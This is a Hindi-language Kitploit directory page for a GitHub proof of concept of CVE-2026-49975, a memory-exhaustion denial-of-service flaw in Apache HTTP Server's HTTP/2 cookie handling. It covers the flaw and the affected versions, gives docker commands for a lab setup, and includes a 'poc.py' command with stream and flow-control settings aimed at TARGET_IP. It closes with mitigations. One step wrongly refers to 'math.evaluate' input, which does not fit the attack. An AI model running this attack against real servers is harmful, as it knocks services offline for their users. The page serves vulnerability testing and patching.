Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-49975 — HTTP/2 बम | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2026-49975
भेद्यता विश्लेषणशोषणवेब सुरक्षाफज़िंगपेनिट्रेशन टेस्टिंग
GitHubeqstlab/cve-2026-49975

CVE-2026-49975

HTTP/2 बम

रिपॉजिटरी देखें
1431 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-49975 HTTP/2 बम

★ CVE-2026-49975 HTTP/2 बम PoC ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


अवलोकन

CVE-2026-49975 Apache HTTP Server में एक Denial of Service (DoS) भेद्यता है। यह भेद्यता HTTP/2 अनुरोध हैंडलिंग पथ में होती है, जहाँ कई cookie हेडर फ़ील्ड्स को LimitRequestFields के विरुद्ध ठीक से गिने बिना विलय किया जा सकता है। एक छोटा HPACK-एन्कोडेड HTTP/2 अनुरोध भेजकर, जो कई cookie हेडर फ़ील्ड्स में विस्तारित होता है, एक हमलावर सर्वर को Cookie हेडर विलय के दौरान बार-बार मेमोरी आवंटित करने के लिए मजबूर कर सकता है। हमलावर फिर HTTP/2 फ्लो कंट्रोल का उपयोग करके प्रतिक्रिया संचरण में देरी कर सकता है, प्रभावित स्ट्रीम्स को खुला रखकर आवंटित मेमोरी को जारी होने से रोक सकता है।


प्रभावित संस्करण

श्रेणीसंस्करण
असुरक्षितApache HTTP Server 2.4.17 ≤ संस्करण ≤ 2.4.67
पैच किया गयाApache HTTP Server 2.4.68 या बाद का

प्रभाव

  • रिमोट Denial of Service (DoS)
  • अत्यधिक मेमोरी खपत
  • सामान्य उपयोगकर्ता अनुरोधों की प्रोसेसिंग में देरी या विफलता

वातावरण

असुरक्षित Apache HTTP Server वातावरण बनाएँ और चलाएँ।

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

असुरक्षित वातावरण शुरू करने के बाद, हमले को दोहराने के लिए नीचे दिए गए चरणों का पालन करें।

चरण 1. सर्वर मेमोरी उपयोग की निगरानी करें

root@kitploit:~
docker stats cve-2026-49975

उदाहरण आउटपुट:

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

चरण 2. HTTP/2 बम PoC चलाएँ

math.evaluate को निम्नलिखित एक्सप्रेशन भेजें (जैसे, एप्लिकेशन के कैलकुलेशन इनपुट के माध्यम से)।

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

चरण 3. परिणाम की पुष्टि करें

जाँच करें कि जब हमले की स्ट्रीम्स खुली रखी जाती हैं, तो Apache कंटेनर की मेमोरी उपयोग बढ़ती है और उच्च बनी रहती है।

शमन

  • Apache HTTP Server को 2.4.68 या बाद के संस्करण में अपग्रेड करें
  • यदि सेवा को HTTP/2 की आवश्यकता नहीं है, तो इसे अस्थायी रूप से अक्षम करने पर विचार करें

विश्लेषण

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • EN:
टूल डाउनलोड करें